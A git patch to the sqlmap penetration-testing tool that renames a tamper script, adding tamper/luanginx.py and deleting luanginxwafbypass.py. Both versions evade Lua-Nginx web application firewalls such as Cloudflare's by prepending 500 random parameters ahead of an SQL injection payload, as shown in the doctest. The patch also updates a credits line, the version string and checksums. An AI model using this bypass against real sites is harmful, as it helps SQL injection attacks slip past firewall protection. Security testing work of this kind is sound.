From f2035145fe08b9c9fbbc6803e81d9bcffa8c486b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 12:10:22 +0200 Subject: [PATCH] Another update related to the #3316 --- doc/THANKS.md | 2 +- lib/core/settings.py | 2 +- tamper/luanginx.py | 36 ++++++++++++++++++++++++++ tamper/luanginxwafbypass.py | 51 ------------------------------------- txt/checksum.md5 | 3 ++- 5 files changed, 40 insertions(+), 54 deletions(-) create mode 100644 tamper/luanginx.py delete mode 100644 tamper/luanginxwafbypass.py diff --git a/doc/THANKS.md b/doc/THANKS.md index e9e20cfdf..e9eb7456d 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -566,7 +566,7 @@ Efrain Torres, * for his great Metasploit WMAP Framework Jennifer Torres, -* for contributing a tamper script luanginxwafbypass.py +* for contributing a tamper script luanginx.py Sandro Tosi, * for helping to create sqlmap Debian package correctly diff --git a/lib/core/settings.py b/lib/core/settings.py index 1b8cff396..4a61e03ff 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.31" +VERSION = "1.2.10.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/luanginx.py b/tamper/luanginx.py new file mode 100644 index 000000000..bca93e16e --- /dev/null +++ b/tamper/luanginx.py @@ -0,0 +1,36 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import string +import random + +from lib.core.enums import HINT +from lib.core.enums import PRIORITY +from lib.core.settings import DEFAULT_GET_POST_DELIMITER + +__priority__ = PRIORITY.NORMAL + +def tamper(payload, **kwargs): + """ + LUA-Nginx WAFs Bypass (e.g. Cloudflare) + + Reference: + * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/ + + Notes: + * Lua-Nginx WAFs do not support processing of more than 100 parameters + + >>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload) + '0U=&Aq=&Fz=&Ws=&DK=&4F=&rU=&Mp=&48=&Y3=&tT=&3Q=&Dg=&AL=&47=&D1=&qX=&Ia=&Sy=&ZP=&aE=&1p=&u1=&lJ=&o7=&XB=&et=&F5=&gI=&RH=&YH=&7L=&KB=&Kx=&Js=&lL=&OD=&fU=&25=&03=&5H=&yR=&rY=&03=&K6=&JB=&O9=&4X=&fL=&EN=&0p=&Th=&nX=&uY=&gj=&Rc=&J4=&HQ=&bN=&LJ=&yw=&8c=&b7=&lh=&nX=&6b=&Ag=&qn=&Ov=&lF=&cg=&9m=&wT=&Z4=&kP=&7d=&P0=&vp=&LB=&kD=&zJ=&Ft=&wZ=&pI=&aT=&uc=&ro=&7v=&rw=&6N=&MS=&yz=&Oa=&lu=&oN=&x2=&Jz=&yR=&zP=&cB=&qj=&GE=&IU=&2E=&tC=&Y2=&Yl=&9N=&fS=&9y=&Qt=&nS=&aZ=&Gg=&hO=&2r=&8g=&0y=&fr=&CX=&1i=&GO=&v2=&rb=&cQ=&I6=&64=&cU=&RO=&S3=&Nx=&Hm=&Ka=&ju=&WS=&uM=&ck=&8r=&yI=&sD=&oc=&lG=&ey=&uz=&g4=&D0=&8v=&DR=&As=&T3=&5M=&x8=&Ne=&fU=&da=&yG=&BE=&KQ=&Aw=&9q=&WA=&wd=&1R=&3B=&Ph=&ym=&c6=&nj=&mx=&Hj=&98=&jz=&Q2=&E4=&tE=&EP=&mL=&nv=&73=&Yc=&jp=&W0=&KS=&Ye=&f1=&cn=&ca=&0u=&jO=&8F=&3F=&JQ=&XU=&9U=&4m=&HL=&ZD=&Xy=&K0=&XO=&al=&Fp=&e1=&6s=&zY=&dN=&hr=&Zd=&cz=&E1=&SP=&j9=&zL=&xc=&Dj=&cM=&Ng=&Iv=&xW=&E2=&LC=&Nu=&hQ=&MW=&h4=&X4=&2Q=&YG=&Wl=&WB=&UC=&We=&c5=&E3=&6P=&Jn=&fY=&3W=&RA=&sh=&AJ=&56=&zg=&VT=&bB=&Qb=&47=&Se=&ew=&bv=&a8=&Ye=&3m=&mP=&6h=&aw=&bL=&1l=&gv=&7i=&7w=&Ds=&67=&Nl=&9g=&Kj=&36=&Xt=&pU=&sA=&ci=&be=&eA=&IT=&iA=&Nf=&Bw=&6d=&zT=&tm=&sD=&6X=&rI=&QX=&By=&VA=&pC=&6i=&CN=&Dm=&aR=&Ma=&sV=&MH=&jR=&DQ=&Vo=&Vr=&9h=&2c=&pG=&Ky=&gp=&rU=&4K=&cX=&sv=&Gp=&5k=&zr=&GJ=&MG=&zN=&zW=&Ws=&xM=&jR=&xK=&iP=&vD=&zD=&Rt=&Od=&sU=&dM=&bD=&3a=&Ge=&1Q=&UP=&ac=&M9=&2R=&To=&Ur=&gC=&uk=&A3=&AB=&RG=&i4=&BW=&yY=&yn=&m6=&Kd=&yo=&fl=&dN=&kL=&LR=&Fr=&2v=&CN=&F7=&75=&5K=&ER=&nq=&ck=&aO=&iW=&Q8=&y5=&Cv=&g2=&Xu=&Cu=&bc=&wm=&Gl=&mP=&Tt=&1p=&vS=&c5=&eC=&Sc=&Y8=&Ch=&fg=&Vz=&4B=&eA=&UZ=&cl=&Eh=&25=&tA=&Ir=&Hm=&sB=&LH=&qo=&hW=&gT=&pr=&TO=&TF=&1h=&Oh=&Tw=&PR=&On=&Zo=&GP=&oM=&rk=&YI=&uK=&bi=&y8=&Fe=&VW=&WJ=&Rn=&TY=&Vv=&KM=&3g=&ZG=&wC=&an=&OE=&7D=&t0=&qL=&RY=&Wx=&dc=&T7=&vB=&SO=&qP=&sw=&HT=&jb=&Mb=&cn=&Oe=&d8=&A3=&nA=&wk=&u9=&Ux=&zq=>=&QC=&c5=&zy=&ai=&1F=&Tj=&u0=&Yp=&bY=&kW=&Qk=&e5=&LM=&Cj=&Lp=&XT=&b5=&cf=&sj=&ow=&Tz=&qE=&yt=&3I=&8V=&Jq=&QC=&Sz=&Eb=&Tc=&QK=&Wr=&Qm=&Gv=&8m=&Ju=&85=&KS=&Qv=&43=&uU=&aY=&J7=&wM=&uW=&L9=&ai=&ch=&56=&D6=&YW=&Ul=&1 AND 2>1' + """ + + hints = kwargs.get("hints", {}) + delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) + + hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.letters + string.digits, 2)) for _ in xrange(500)) + + return payload diff --git a/tamper/luanginxwafbypass.py b/tamper/luanginxwafbypass.py deleted file mode 100644 index 5b694545b..000000000 --- a/tamper/luanginxwafbypass.py +++ /dev/null @@ -1,51 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -""" -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -''' -[+] LUA-Nginx WAFs Bypass (Cloudflare) -Lua-Nginx WAFs doesn't support processing for more than 100 parameters. - -Example: sqlmap -r file.txt --tamper=luanginxwafbypass.py --dbs --skip-urlencode -p vulnparameter -Required options: --skip-urlencode, -p -''' - -import sys -import string -import random -from lib.core.enums import PRIORITY -from lib.core.data import conf -__priority__ = PRIORITY.HIGHEST - -''' Random parameter''' -def randomParameterGenerator(size=6, chars=string.ascii_uppercase + string.digits): - output = ''.join(random.choice(chars) for _ in range(size)) - return output - -''' Tamper ''' -def tamper(payload, **kwargs): - try: - headers = kwargs.get("headers", {}) - randomParameter = randomParameterGenerator() - parameter = conf["testParameter"][0] - - if not parameter: - print "\n[-] [ERROR] Add an injectable parameter with -p option (-p param)" - sys.exit(0) - - if conf["skipUrlEncode"] != True: - print "\n[-] [ERROR] --skip-urlencode option must be activated" - sys.exit(0) - - # Add 500 parameters to payload - luaBypass = ("&" + randomParameter + "=")*500 + "&" - outputPayload = luaBypass + parameter + "=" + payload - - return outputPayload - except Exception as error: - print error - return None diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fa2c02401..31960d072 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -737cfceb9db54a600e3983ef350f939a lib/core/settings.py +47482757115424a7155720ee7d3e0ced lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -261,6 +261,7 @@ ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 40d1ea0796fd91cb3cdd602e36daed15 tamper/lowercase.py +a54b361da0ac6988d0b97bc79463615d tamper/luanginx.py 1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py 91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py